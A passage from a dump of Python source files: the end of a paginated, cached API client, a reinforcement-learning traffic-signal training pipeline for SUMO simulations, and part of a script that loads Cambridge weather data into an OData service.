if type(data) is list:
return obj+data
return obj.append(data)
def check_consistent(self,pages_count,command,params,method,body,validate_array=None):
consistent=True
for i in range(pages_count):
page_params=params.copy()
page_params['page']=i+1
page=self.op_single(command,params=page_params,method=method,etag=None,body=body,raw=True,validate_array=validate_array)
last_header=dict(page['headers'])
last_status=page['status_code']
last_validated_headers=page['validated_headers']
if not last_validated_headers:
self.dbg(i,['data changed before getted'])
consistent=False
if (not ( page['status_code'] == 304 )):
self.dbg(i,['status_code',page['status_code']])
consistent=False
if not int(page['headers']['X-Pages']) == pages_count:
self.dbg(i,['pages_count changed',pages_count,int(page['headers']['X-Pages'])])
pages_count=int(page['headers']['X-Pages'])
consistent=False
if not consistent:
break
return {
'consistent':consistent,
'pages_count':pages_count,
'last_header':last_header,
'last_status':last_status,
'validated_headers':last_validated_headers
}
def get_all_pages(self,first,pages_count,command,params,method,body):
result=[]
result_hash=[]
last_header=dict(first['headers'])
last_status=first['status_code']
last_validated_headers=False
consistent=True
validate_array=None
for i in range(pages_count):
page_params=params.copy()
page_params['page']=i+1
uri=self.param_creator(command,page_params,token=False)
if uri is None:
return None
result_hash.append(self.uri_hash(uri))
page=self.op_single(command,params=page_params,method=method,body=body, raw=True, validate_array=validate_array)
if i==0: #Make validate_array for first page
validate_array=self.make_validate_array(page['headers'])
last_header=dict(page['headers'])
last_status=page['status_code']
last_validated_headers=page['validated_headers']
consistent=page['consistent']
data=self.json(page['data'])
if type(data) is None:
consistent=False
break
if not last_validated_headers:
self.dbg(i,['data changed before getted'])
consistent=False
break
if last_status in [200,304] :
if ( (last_status == 200) and (self.use_cache) ):
self.dbg(i,last_status)
consistent=False
else:
self.dbg(i,last_status)
consistent=False
break
if page['error']:
data=self.json(page['data'])
consistent=False
result=self.paged_data(data,result)
return {
'consistent':consistent,
'pages_count':pages_count,
'result':result,
'result_hash':result_hash,
'last_header':last_header,
'last_status':last_status,
'validated_headers':last_validated_headers,
'validate_array':validate_array
}
def make_validate_array(self,headers):
validate_array={
'X-Pages':None,
'Last-Modified':None,
}
for field in validate_array:
if field in headers:
validate_array[field]=headers[field]
return validate_array
def data_returner(self,data,raw):
json_data=self.json(data['data'])
if not type(json_data) is None:
data['data']=json_data
if raw:
return data
return data['data']
def list_filters_fields(self,data,query_array):
for query in query_array:
if self.list_filters_field(data,query[0],query[1],query[2]):
last_map_action=query[3]
if self.last_map_action == None:
self.last_map_action=last_map_action
elif self.last_map_action_priority.index(self.last_map_action) > self.last_map_action_priority.index(last_map_action):
self.last_map_action=last_map_action
def list_filters_field(self,data,field_name,operator,compared_data):
if field_name in data:
if operator == '==':
return data[field_name] == compared_data
elif operator == '!=':
return (not (data[field_name] == compared_data))
elif operator == '>':
return data[field_name] > compared_data
elif operator == '<':
return data[field_name] < compared_data
elif operator == '>=':
return data[field_name] >= compared_data
elif operator == '<=':
return data[field_name] <= compared_data
elif operator == 'in':
return data[field_name] in compared_data
elif operator == 'not in':
return (not (data[field_name] in compared_data))
elif operator == 'startswith':
return data[field_name].startswith(compared_data)
elif operator == 'endswith':
return data[field_name].endswith(compared_data)
elif operator == 're':
return (not (compared_data.match(data[field_name]) == None))
return False
def map_obj (self,data,obj):
return_data={}
if self.last_map_action in ['skip','stop']:
return return_data
if 'fields' in obj:
if type(obj['fields']) is list:
for field in obj['fields']:
if field in data:
return_data[field]=data[field]
else:
return data[obj['fields']]
if self.last_map_action == 'stop':
return return_data
if 'id' in obj:
if (('params' in obj) and (obj['id'] in obj['params'])):
return_data.update({obj['id']:obj['params'][obj['id']]})
elif obj['id'] in self.user_auth:
return_data.update({obj['id']:self.user_auth[obj['id']]})
if 'map' in obj:
for field in obj['map']:
if not (field in data):
continue
n_param={}
n_param[field]=data[field]
new_obj=obj['map'][field].copy()
if 'link' in obj['map'][field]:
n_param[obj['map'][field]['link']]=n_param[field]
new_obj['id']=new_obj['link']
del n_param[field]
del new_obj['link']
else:
new_obj['id']=field
if 'params' in obj['map'][field]:
n_param.update(obj['map'][field]['params'])
del new_obj['params']
new_obj['params']=n_param
if self.last_map_action == 'stop':
return return_data
if 'name' in obj['map'][field]:
return_data[obj['map'][field]['name']]=self.map(new_obj,first=False)
else:
return_data[field]=self.map(new_obj,first=False)
return return_data
def map_list (self,data,obj):
return_data=[]
for field in data:
if 'list_filters' in obj:
self.list_filters_fields(field,obj['list_filters'])
if self.last_map_action == 'stop':
return return_data
if self.last_map_action == 'skip':
self.last_map_action=None
continue
return_data.append(self.map_check(field,obj))
return return_data
def map_check (self,data,obj):
if self.last_map_action == 'stop':
return None
if type(data) is dict:
return_data=self.map_obj(data,obj)
elif type(data) is list:
return_data=self.map_list(data,obj)
elif 'link' in obj:
new_obj=obj.copy()
if not 'params' in obj:
new_obj['params']={}
new_obj['params'][obj['link']]=data
return_data=self.map(new_obj,first=False)
else:
return_data=data
return return_data
def make_flags(self,flags):
self_flags=dir(self)
prev_state={}
for flag in flags:
if flag in self_flags:
prev_state[flag]=getattr(self,flag)
setattr(self,flag,True)
return prev_state
def return_state(self,flags):
self_flags=dir(self)
for flag in flags:
if flag in self_flags:
setattr(self,flag,flags[flag])
def map (self,obj,first=True):
params={}
if 'params' in obj:
params=obj['params']
command=None
method="GET"
if 'get' in obj:
command=obj['get']
method="GET"
prev_state={}
if 'flags' in obj:
prev_state=self.make_flags(obj['flags'])
data=self.op(command,params=params,method=method)
error_try=0
while (type(data) is list) and (len(data) > 0) and (data[0]=="json_error") and (error_try<self.repeat_max_try):
invert_cache=self.force_cache
if invert_cache:
self.force_cache=False
data=self.op(command,params=params,method=method)
if invert_cache:
self.force_cache=True
error_try=error_try+1
if 'flags' in obj:
self.return_state(prev_state)
return_data=self.map_check(data,obj)
if first:
self.last_map_action=None
return return_data
def op(self,command,params={},post=False,etag=None,method="GET",body=None,raw=False,single=False):
if ((post) and (method=="GET")):
method="POST"
if ((method == "GET") and (single)): # Return not paged GET request
return self.op_single(command,params=params,post=post,etag=etag,method=method,body=body,raw=raw)
first=self.op_single(command,params=params,method=method,body=body, raw=True)
if first is None:
return None
data=self.json(first['data'])
if type(data) is None:
self.dbg('data is not valid json')
return self.data_returner(first,raw)
if not 'X-Pages' in first['headers']: # Single page responce
return self.data_returner(first,raw)
if not self.use_cache:
self.dbg('cannot get consistented and verified paged data without cache')
return self.data_returner(first,raw)
pages_count=int(first['headers']['X-Pages'])
consistent_try=0
consistent=False
result={'consistent':False,'pages_count':pages_count, 'result':[], 'result_hash':[], 'last_header':dict(first['headers']),'last_status':first['status_code']}
while ( (not consistent) and (consistent_try < self.max_consistent_try)):
consistent=False
consistent_try=consistent_try+1
self.dbg('get_all_pages')
result=self.get_all_pages(first,pages_count,command,params,method,body) # Getting data
self.cache.Sync()
if result['consistent']:
consistent=True
break
elif not result['validated_headers']: # Restart request pages if data changed
continue
self.dbg('check_consistent')
check=self.check_consistent(pages_count,command,params,method,body,result['validate_array'])
self.cache.Sync()
if not check['consistent']:
consistent=False
pages_count=check['pages_count']
continue
consistent=True
result['consistent']=check['consistent']
result['pages_count']=check['pages_count']
result['last_header']=check['last_header']
result['last_status']=check['last_status']
if consistent:
if raw:
return self.http_return_obj(self.use_cache,result['last_status'],result['result'],result['last_header'],True)
return result['result']
self.dbg('Cannot get consistent data')
return self.http_return_obj(first['cached'],first['status_code'],first['data'],first['headers'],False)
|
pipeline.py
|
import json
import os
import shutil
import xml.etree.ElementTree as ET
from generator import Generator
from construct_sample import ConstructSample
from updater import Updater
from multiprocessing import Process, Pool
from model_pool import ModelPool
import random
import pickle
import model_test
import pandas as pd
import numpy as np
from math import isnan
import sys
import time
import traceback
class Pipeline:
_LIST_SUMO_FILES = [
"cross.tll.xml",
"cross.car.type.xml",
"cross.con.xml",
"cross.edg.xml",
"cross.net.xml",
"cross.netccfg",
"cross.nod.xml",
"cross.sumocfg",
"cross.typ.xml"
]
@staticmethod
def _set_traffic_file(sumo_config_file_tmp_name, sumo_config_file_output_name, list_traffic_file_name):
# update sumocfg
sumo_cfg = ET.parse(sumo_config_file_tmp_name)
config_node = sumo_cfg.getroot()
input_node = config_node.find("input")
for route_files in input_node.findall("route-files"):
input_node.remove(route_files)
input_node.append(
ET.Element("route-files", attrib={"value": ",".join(list_traffic_file_name)}))
sumo_cfg.write(sumo_config_file_output_name)
def _path_check(self):
# check path
if os.path.exists(self.dic_path["PATH_TO_WORK_DIRECTORY"]):
if self.dic_path["PATH_TO_WORK_DIRECTORY"] != "records/default":
raise FileExistsError
else:
pass
else:
os.makedirs(self.dic_path["PATH_TO_WORK_DIRECTORY"])
if os.path.exists(self.dic_path["PATH_TO_MODEL"]):
if self.dic_path["PATH_TO_MODEL"] != "model/default":
raise FileExistsError
else:
pass
else:
os.makedirs(self.dic_path["PATH_TO_MODEL"])
if os.path.exists(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"]):
pass
else:
os.makedirs(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"])
if os.path.exists(self.dic_path["PATH_TO_PRETRAIN_MODEL"]):
pass
else:
os.makedirs(self.dic_path["PATH_TO_PRETRAIN_MODEL"])
def _copy_conf_file(self, path=None):
# write conf files
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
json.dump(self.dic_exp_conf, open(os.path.join(path, "exp.conf"), "w"),
indent=4)
json.dump(self.dic_agent_conf, open(os.path.join(path, "agent.conf"), "w"),
indent=4)
json.dump(self.dic_traffic_env_conf,
open(os.path.join(path, "traffic_env.conf"), "w"), indent=4)
def _copy_sumo_file(self, path=None):
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
# copy sumo files
for file_name in self._LIST_SUMO_FILES:
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], file_name),
os.path.join(path, file_name))
for file_name in self.dic_exp_conf["TRAFFIC_FILE"]:
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], file_name),
os.path.join(path, file_name))
def _copy_anon_file(self, path=None):
# hard code !!!
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
# copy sumo files
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], self.dic_exp_conf["TRAFFIC_FILE"][0]),
os.path.join(path, self.dic_exp_conf["TRAFFIC_FILE"][0]))
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], self.dic_exp_conf["ROADNET_FILE"]),
os.path.join(path, self.dic_exp_conf["ROADNET_FILE"]))
def _modify_sumo_file(self, path=None):
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
# modify sumo files
self._set_traffic_file(os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "cross.sumocfg"),
os.path.join(path, "cross.sumocfg"),
self.dic_exp_conf["TRAFFIC_FILE"])
def __init__(self, dic_exp_conf, dic_agent_conf, dic_traffic_env_conf, dic_path):
# load configurations
self.dic_exp_conf = dic_exp_conf
self.dic_agent_conf = dic_agent_conf
self.dic_traffic_env_conf = dic_traffic_env_conf
self.dic_path = dic_path
# do file operations
self._path_check()
self._copy_conf_file()
if self.dic_traffic_env_conf["SIMULATOR_TYPE"] == 'sumo':
self._copy_sumo_file()
self._modify_sumo_file()
elif self.dic_traffic_env_conf["SIMULATOR_TYPE"] == 'anon':
self._copy_anon_file()
# test_duration
self.test_duration = []
sample_num = 10 if self.dic_traffic_env_conf["NUM_INTERSECTIONS"]>=10 else min(self.dic_traffic_env_conf["NUM_INTERSECTIONS"], 9)
print("sample_num for early stopping:", sample_num)
self.sample_inter_id = random.sample(range(self.dic_traffic_env_conf["NUM_INTERSECTIONS"]), sample_num)
def early_stopping(self, dic_path, cnt_round): # Todo multi-process
print("decide whether to stop")
early_stopping_start_time = time.time()
record_dir = os.path.join(dic_path["PATH_TO_WORK_DIRECTORY"], "test_round", "round_"+str(cnt_round))
ave_duration_all = []
# compute duration
for inter_id in self.sample_inter_id:
try:
df_vehicle_inter_0 = pd.read_csv(os.path.join(record_dir, "vehicle_inter_{0}.csv".format(inter_id)),
sep=',', header=0, dtype={0: str, 1: float, 2: float},
names=["vehicle_id", "enter_time", "leave_time"])
duration = df_vehicle_inter_0["leave_time"].values - df_vehicle_inter_0["enter_time"].values
ave_duration = np.mean([time for time in duration if not isnan(time)])
ave_duration_all.append(ave_duration)
except FileNotFoundError:
error_dir = os.path.join(dic_path["PATH_TO_WORK_DIRECTORY"]).replace("records", "errors")
if not os.path.exists(error_dir):
os.makedirs(error_dir)
f = open(os.path.join(error_dir, "error_info.txt"), "a")
f.write("Fail to read csv of inter {0} in early stopping of round {1}\n".format(inter_id, cnt_round))
f.close()
pass
ave_duration = np.mean(ave_duration_all)
self.test_duration.append(ave_duration)
early_stopping_end_time = time.time()
print("early_stopping time: {0}".format(early_stopping_end_time - early_stopping_start_time) )
if len(self.test_duration) < 30:
return 0
else:
duration_under_exam = np.array(self.test_duration[-15:])
mean_duration = np.mean(duration_under_exam)
std_duration = np.std(duration_under_exam)
max_duration = np.max(duration_under_exam)
if std_duration/mean_duration < 0.1 and max_duration < 1.5 * mean_duration:
return 1
else:
return 0
def generator_wrapper(self, cnt_round, cnt_gen, dic_path, dic_exp_conf, dic_agent_conf, dic_traffic_env_conf,
best_round=None):
generator = Generator(cnt_round=cnt_round,
cnt_gen=cnt_gen,
dic_path=dic_path,
dic_exp_conf=dic_exp_conf,
dic_agent_conf=dic_agent_conf,
dic_traffic_env_conf=dic_traffic_env_conf,
best_round=best_round
)
print("make generator")
generator.generate()
print("generator_wrapper end")
return
def updater_wrapper(self, cnt_round, dic_agent_conf, dic_exp_conf, dic_traffic_env_conf, dic_path, best_round=None, bar_round=None):
updater = Updater(
cnt_round=cnt_round,
dic_agent_conf=dic_agent_conf,
dic_exp_conf=dic_exp_conf,
dic_traffic_env_conf=dic_traffic_env_conf,
dic_path=dic_path,
best_round=best_round,
bar_round=bar_round
)
updater.load_sample_for_agents()
updater.update_network_for_agents()
print("updater_wrapper end")
return
def model_pool_wrapper(self, dic_path, dic_exp_conf, cnt_round):
model_pool = ModelPool(dic_path, dic_exp_conf)
model_pool.model_compare(cnt_round)
model_pool.dump_model_pool()
return
#self.best_round = model_pool.get()
#print("self.best_round", self.best_round)
def downsample(self, path_to_log, i):
path_to_pkl = os.path.join(path_to_log, "inter_{0}.pkl".format(i))
with open(path_to_pkl, "rb") as f_logging_data:
try:
logging_data = pickle.load(f_logging_data)
subset_data = logging_data[::10]
print(subset_data)
os.remove(path_to_pkl)
with open(path_to_pkl, "wb") as f_subset:
try:
pickle.dump(subset_data, f_subset)
except Exception as e:
print("----------------------------")
print("Error occurs when WRITING pickles when down sampling for inter {0}".format(i))
print('traceback.format_exc():\n%s' % traceback.format_exc())
print("----------------------------")
except Exception as e:
# print("CANNOT READ %s"%path_to_pkl)
print("----------------------------")
print("Error occurs when READING pickles when down sampling for inter {0}, {1}".format(i, f_logging_data))
print('traceback.format_exc():\n%s' % traceback.format_exc())
print("----------------------------")
def downsample_for_system(self, path_to_log, dic_traffic_env_conf):
for i in range(dic_traffic_env_conf['NUM_INTERSECTIONS']):
self.downsample(path_to_log, i)
def construct_sample_multi_process(self, train_round, cnt_round, batch_size=200):
cs = ConstructSample(path_to_samples=train_round, cnt_round=cnt_round,
dic_traffic_env_conf=self.dic_traffic_env_conf)
if batch_size > self.dic_traffic_env_conf['NUM_INTERSECTIONS']:
batch_size_run = self.dic_traffic_env_conf['NUM_INTERSECTIONS']
else:
batch_size_run = batch_size
process_list = []
for batch in range(0, self.dic_traffic_env_conf['NUM_INTERSECTIONS'], batch_size_run):
start = batch
stop = min(batch + batch_size, self.dic_traffic_env_conf['NUM_INTERSECTIONS'])
process_list.append(Process(target=self.construct_sample_batch, args=(cs, start, stop)))
for t in process_list:
t.start()
for t in process_list:
t.join()
def construct_sample_batch(self, cs, start,stop):
for inter_id in range(start, stop):
print("make construct_sample_wrapper for ", inter_id)
cs.make_reward(inter_id)
def run(self, multi_process=False):
best_round, bar_round = None, None
f_time = open(os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"],"running_time.csv"),"w")
f_time.write("generator_time\tmaking_samples_time\tupdate_network_time\ttest_evaluation_times\tall_times\n")
f_time.close()
if self.dic_exp_conf["PRETRAIN"]:
if os.listdir(self.dic_path["PATH_TO_PRETRAIN_MODEL"]):
for i in range(self.dic_traffic_env_conf["NUM_AGENTS"]):
#TODO:only suitable for CoLight
shutil.copy(os.path.join(self.dic_path["PATH_TO_PRETRAIN_MODEL"],
"round_0_inter_%d.h5" % i),
os.path.join(self.dic_path["PATH_TO_MODEL"], "round_0_inter_%d.h5"%i))
else:
if not os.listdir(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"]):
for cnt_round in range(self.dic_exp_conf["PRETRAIN_NUM_ROUNDS"]):
print("round %d starts" % cnt_round)
process_list = []
# ============== generator =============
if multi_process:
for cnt_gen in range(self.dic_exp_conf["PRETRAIN_NUM_GENERATORS"]):
p = Process(target=self.generator_wrapper,
args=(cnt_round, cnt_gen, self.dic_path, self.dic_exp_conf,
self.dic_agent_conf, self.dic_traffic_env_conf, best_round)
)
print("before")
p.start()
print("end")
process_list.append(p)
print("before join")
for p in process_list:
p.join()
print("end join")
else:
for cnt_gen in range(self.dic_exp_conf["PRETRAIN_NUM_GENERATORS"]):
self.generator_wrapper(cnt_round=cnt_round,
cnt_gen=cnt_gen,
dic_path=self.dic_path,
dic_exp_conf=self.dic_exp_conf,
dic_agent_conf=self.dic_agent_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
best_round=best_round)
# ============== make samples =============
# make samples and determine which samples are good
train_round = os.path.join(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"], "train_round")
if not os.path.exists(train_round):
os.makedirs(train_round)
cs = ConstructSample(path_to_samples=train_round, cnt_round=cnt_round,
dic_traffic_env_conf=self.dic_traffic_env_conf)
cs.make_reward()
if self.dic_exp_conf["MODEL_NAME"] in self.dic_exp_conf["LIST_MODEL_NEED_TO_UPDATE"]:
if multi_process:
p = Process(target=self.updater_wrapper,
args=(0,
self.dic_agent_conf,
self.dic_exp_conf,
self.dic_traffic_env_conf,
self.dic_path,
best_round))
p.start()
p.join()
else:
self.updater_wrapper(cnt_round=0,
dic_agent_conf=self.dic_agent_conf,
dic_exp_conf=self.dic_exp_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
dic_path=self.dic_path,
best_round=best_round)
# train with aggregate samples
if self.dic_exp_conf["AGGREGATE"]:
if "aggregate.h5" in os.listdir("model/initial"):
shutil.copy("model/initial/aggregate.h5",
os.path.join(self.dic_path["PATH_TO_MODEL"], "round_0.h5"))
else:
if multi_process:
p = Process(target=self.updater_wrapper,
args=(0,
self.dic_agent_conf,
self.dic_exp_conf,
self.dic_traffic_env_conf,
self.dic_path,
best_round))
p.start()
p.join()
else:
self.updater_wrapper(cnt_round=0,
dic_agent_conf=self.dic_agent_conf,
dic_exp_conf=self.dic_exp_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
dic_path=self.dic_path,
best_round=best_round)
self.dic_exp_conf["PRETRAIN"] = False
self.dic_exp_conf["AGGREGATE"] = False
# trainf
for cnt_round in range(self.dic_exp_conf["NUM_ROUNDS"]):
print("round %d starts" % cnt_round)
round_start_time = time.time()
process_list = []
print("============== generator =============")
generator_start_time = time.time()
if multi_process:
for cnt_gen in range(self.dic_exp_conf["NUM_GENERATORS"]):
p = Process(target=self.generator_wrapper,
args=(cnt_round, cnt_gen, self.dic_path, self.dic_exp_conf,
self.dic_agent_conf, self.dic_traffic_env_conf, best_round)
)
print("before p")
p.start()
print("end p")
process_list.append(p)
print("before join")
for i in range(len(process_list)):
p = process_list[i]
print("generator %d to join" % i)
p.join()
print("generator %d finish join" % i)
print("end join")
else:
for cnt_gen in range(self.dic_exp_conf["NUM_GENERATORS"]):
self.generator_wrapper(cnt_round=cnt_round,
cnt_gen=cnt_gen,
dic_path=self.dic_path,
dic_exp_conf=self.dic_exp_conf,
dic_agent_conf=self.dic_agent_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
best_round=best_round)
generator_end_time = time.time()
generator_total_time = generator_end_time - generator_start_time
print("============== make samples =============")
# make samples and determine which samples are good
making_samples_start_time = time.time()
train_round = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "train_round")
if not os.path.exists(train_round):
os.makedirs(train_round)
cs = ConstructSample(path_to_samples=train_round, cnt_round=cnt_round,
dic_traffic_env_conf=self.dic_traffic_env_conf)
cs.make_reward_for_system()
# EvaluateSample()
making_samples_end_time = time.time()
making_samples_total_time = making_samples_end_time - making_samples_start_time
print("============== update network =============")
update_network_start_time = time.time()
if self.dic_exp_conf["MODEL_NAME"] in self.dic_exp_conf["LIST_MODEL_NEED_TO_UPDATE"]:
if multi_process:
p = Process(target=self.updater_wrapper,
args=(cnt_round,
self.dic_agent_conf,
self.dic_exp_conf,
self.dic_traffic_env_conf,
self.dic_path,
best_round,
bar_round))
p.start()
print("update to join")
p.join()
print("update finish join")
else:
self.updater_wrapper(cnt_round=cnt_round,
dic_agent_conf=self.dic_agent_conf,
dic_exp_conf=self.dic_exp_conf,
dic_traffic_env_conf=self.dic_traffic_env_conf,
dic_path=self.dic_path,
best_round=best_round,
bar_round=bar_round)
if not self.dic_exp_conf["DEBUG"]:
for cnt_gen in range(self.dic_exp_conf["NUM_GENERATORS"]):
path_to_log = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "train_round",
"round_" + str(cnt_round), "generator_" + str(cnt_gen))
try:
self.downsample_for_system(path_to_log,self.dic_traffic_env_conf)
except Exception as e:
print("----------------------------")
print("Error occurs when downsampling for round {0} generator {1}".format(cnt_round, cnt_gen))
print("traceback.format_exc():\n%s"%traceback.format_exc())
print("----------------------------")
update_network_end_time = time.time()
update_network_total_time = update_network_end_time - update_network_start_time
print("============== test evaluation =============")
test_evaluation_start_time = time.time()
if multi_process:
p = Process(target=model_test.test,
args=(self.dic_path["PATH_TO_MODEL"], cnt_round, self.dic_exp_conf["RUN_COUNTS"], self.dic_traffic_env_conf, False))
p.start()
if self.dic_exp_conf["EARLY_STOP"]:
p.join()
else:
model_test.test(self.dic_path["PATH_TO_MODEL"], cnt_round, self.dic_exp_conf["RUN_COUNTS"], self.dic_traffic_env_conf, if_gui=False)
test_evaluation_end_time = time.time()
test_evaluation_total_time = test_evaluation_end_time - test_evaluation_start_time
print('============== early stopping =============')
if self.dic_exp_conf["EARLY_STOP"]:
flag = self.early_stopping(self.dic_path, cnt_round)
if flag == 1:
print("early stopping!")
print("training ends at round %s" % cnt_round)
break
print('============== model pool evaluation =============')
if self.dic_exp_conf["MODEL_POOL"] and cnt_round > 50:
if multi_process:
p = Process(target=self.model_pool_wrapper,
args=(self.dic_path,
self.dic_exp_conf,
cnt_round),
)
p.start()
print("model_pool to join")
p.join()
print("model_pool finish join")
else:
self.model_pool_wrapper(dic_path=self.dic_path,
dic_exp_conf=self.dic_exp_conf,
cnt_round=cnt_round)
model_pool_dir = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "best_model.pkl")
if os.path.exists(model_pool_dir):
model_pool = pickle.load(open(model_pool_dir, "rb"))
ind = random.randint(0, len(model_pool) - 1)
best_round = model_pool[ind][0]
ind_bar = random.randint(0, len(model_pool) - 1)
flag = 0
while ind_bar == ind and flag < 10:
ind_bar = random.randint(0, len(model_pool) - 1)
flag += 1
# bar_round = model_pool[ind_bar][0]
bar_round = None
else:
best_round = None
bar_round = None
# downsample
if not self.dic_exp_conf["DEBUG"]:
path_to_log = os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "test_round",
"round_" + str(cnt_round))
self.downsample_for_system(path_to_log, self.dic_traffic_env_conf)
else:
best_round = None
print("best_round: ", best_round)
print("Generator time: ",generator_total_time)
print("Making samples time:", making_samples_total_time)
print("update_network time:", update_network_total_time)
print("test_evaluation time:", test_evaluation_total_time)
print("round {0} ends, total_time: {1}".format(cnt_round, time.time()-round_start_time))
f_time = open(os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"],"running_time.csv"),"a")
f_time.write("{0}\t{1}\t{2}\t{3}\t{4}\n".format(generator_total_time,making_samples_total_time,
update_network_total_time,test_evaluation_total_time,
time.time()-round_start_time))
f_time.close()
|
weather.py
|
#! /usr/bin/env python
"""Creates an OData service from weather data"""
import io
import logging
import os
import os.path
import threading
import time
from wsgiref.simple_server import make_server
from pyslet import iso8601 as iso
from pyslet.http import client as http
from pyslet.odata2 import csdl as edm
from pyslet.odata2 import core as core
from pyslet.odata2 import metadata as edmx
from pyslet.odata2.memds import InMemoryEntityContainer
from pyslet.odata2.server import ReadOnlyServer
from pyslet.odata2.sqlds import SQLiteEntityContainer
from pyslet.py2 import output, to_text
# SAMPLE_DIR='small-sample'
SAMPLE_DIR = 'daily-text'
SAMPLE_DB = 'weather.db'
SERVICE_PORT = 8080
SERVICE_ROOT = "http://localhost:%i/" % SERVICE_PORT
def load_metadata(path=os.path.join(os.path.split(__file__)[0],
'weather_schema.xml')):
"""Loads the metadata file from the current directory."""
doc = edmx.Document()
with open(path, 'rb') as f:
doc.read(f)
return doc
def make_container(doc, drop=False, path=SAMPLE_DB):
if drop and os.path.isfile(path):
os.remove(path)
create = not os.path.isfile(path)
container = SQLiteEntityContainer(
file_path=path,
container=doc.root.DataServices['WeatherSchema.CambridgeWeather'])
if create:
container.create_all_tables()
return doc.root.DataServices['WeatherSchema.CambridgeWeather']
def make_mysql_container(doc, drop=False, create=False, host="localhost",
user="weather", password="password",
database="weather"):
import pyslet.mysqldbds as mysql
container = mysql.MySQLEntityContainer(
host=host, user=user, passwd=password, db=database,
container=doc.root.DataServices['WeatherSchema.CambridgeWeather'])
if drop:
container.drop_all_tables()
if create:
container.create_all_tables()
return doc.root.DataServices['WeatherSchema.CambridgeWeather']
def is_bst(t):
"""Returns True/False/Unknown if the timepoint t is in BST
This function uses the last Sunday in the month algorithm even
though most sources say that prior to 1996 the rule was different.
The only date of contention in this data set is 1995-10-22 which
should have a clock change but the data set clearly have a change on
1995-10-29, a week later."""
century, year, month, day = t.date.get_calendar_day()
if month < 3:
return False
elif month == 3:
if day < 24:
return False
# deal with switch to BST
century, decade, year, week, weekday = t.date.get_week_day()
if weekday == 7:
# Sunday - look deeper
hour, minute, second = t.time.get_time()
if hour <= 1:
return False
else:
return True
elif day + (7 - weekday) > 31:
# next Sunday's date is in April, we already changed
return True
else:
# next Sunday's date is in March, we haven't changed yet
return False
elif month < 10:
return True
elif month == 10:
if day < 24:
return True
# deal with switch to GMT
century, decade, year, week, weekday = t.date.get_week_day()
if weekday == 7:
# Sunday - look deeper
hour, minute, second = t.time.get_time()
if hour < 1:
return True
elif hour > 1:
return False
else:
return None # Ambiguous time
elif day + (7 - weekday) > 31:
# next Sunday's date is in November, we already changed
return False
else:
# next Sunday's date is in October, we haven't changed yet
return True
else:
return False
def load_data_from_file(weather_data, f, year, month, day):
with weather_data.open() as collection:
while True:
line = f.readline().decode('ascii')
if len(line) == 0 or line.startswith('Date unknown.'):
break
elif line[0] == '#':
continue
data = line.split()
if not data:
continue
if len(data) < 11:
data = data + ['*'] * (11 - len(data))
for i in (1, 3, 5, 7, 8, 10):
try:
data[i] = float(data[i])
except ValueError:
data[i] = None
for i in (2, 4):
try:
data[i] = int(data[i])
except ValueError:
data[i] = None
data[6] = data[6].strip()
data_point = collection.new_entity()
hour, min = [int(i) for i in data[0].split(':')]
tvalue = iso.TimePoint(
date=iso.Date(century=year // 100, year=year %
100, month=month, day=day),
time=iso.Time(hour=hour, minute=min, second=0))
bst = is_bst(tvalue)
if bst is not False:
# assume BST for now, add the zone info and then shift to GMT
tvalue = tvalue.with_zone(
zdirection=1, zhour=1).shift_zone(zdirection=0)
data_point['TimePoint'].set_from_value(tvalue)
data_point['Temperature'].set_from_value(data[1])
data_point['Humidity'].set_from_value(data[2])
data_point['DewPoint'].set_from_value(data[3])
data_point['Pressure'].set_from_value(data[4])
data_point['WindSpeed'].set_from_value(data[5])
data_point['WindDirection'].set_from_value(data[6])
data_point['Sun'].set_from_value(data[7])
data_point['Rain'].set_from_value(data[8])
shour, smin = [int(i) for i in data[9].split(':')]
data_point['SunRainStart'].set_from_value(
iso.Time(hour=shour, minute=smin, second=0))
data_point['WindSpeedMax'].set_from_value(data[10])
try:
collection.insert_entity(data_point)
except edm.ConstraintError:
if bst is None:
# This was an ambiguous entry, the first one is in
# BST, the second one is in GMT as the clocks have
# gone back, so we shift forward again and then
# force the zone to GMT
tvalue = tvalue.shift_zone(
zdirection=1, zhour=1).with_zone(zdirection=0)
data_point['TimePoint'].set_from_value(tvalue)
logging.info(
"Auto-detecting switch to GMT at: %s", str(tvalue))
try:
collection.insert_entity(data_point)
except KeyError:
logging.error("Duplicate data point during BST/GMT "
"switching: %s", str(tvalue))
else:
logging.error(
"Unexpected duplicate data point: %s", str(tvalue))
def load_data(weather_data, dir_name):
for file_name in os.listdir(dir_name):
if not file_name[0:4].isdigit() or file_name[-1] == '~':
# ignore odd files and some editor backups
continue
logging.info(
"Loading data from file %s", os.path.join(dir_name, file_name))
year, month, day = [int(np) for np in file_name.split('_')]
with open(os.path.join(dir_name, file_name), 'r') as f:
load_data_from_file(weather_data, f, year, month, day)
def load_notes(weather_notes, file_name, weather_data):
with open(file_name, 'r') as f:
id = 1
with weather_notes.open() as collection:
with weather_data.open() as data:
while True:
line = f.readline()
if len(line) == 0:
break
elif line[0] == '#':
continue
note_words = line.split()
if note_words:
note = collection.new_entity()
note['ID'].set_from_value(id)
start = iso.TimePoint(
date=iso.Date.from_str(note_words[0]),
time=iso.Time(hour=0, minute=0, second=0))
note['StartDate'].set_from_value(start)
end = iso.TimePoint(
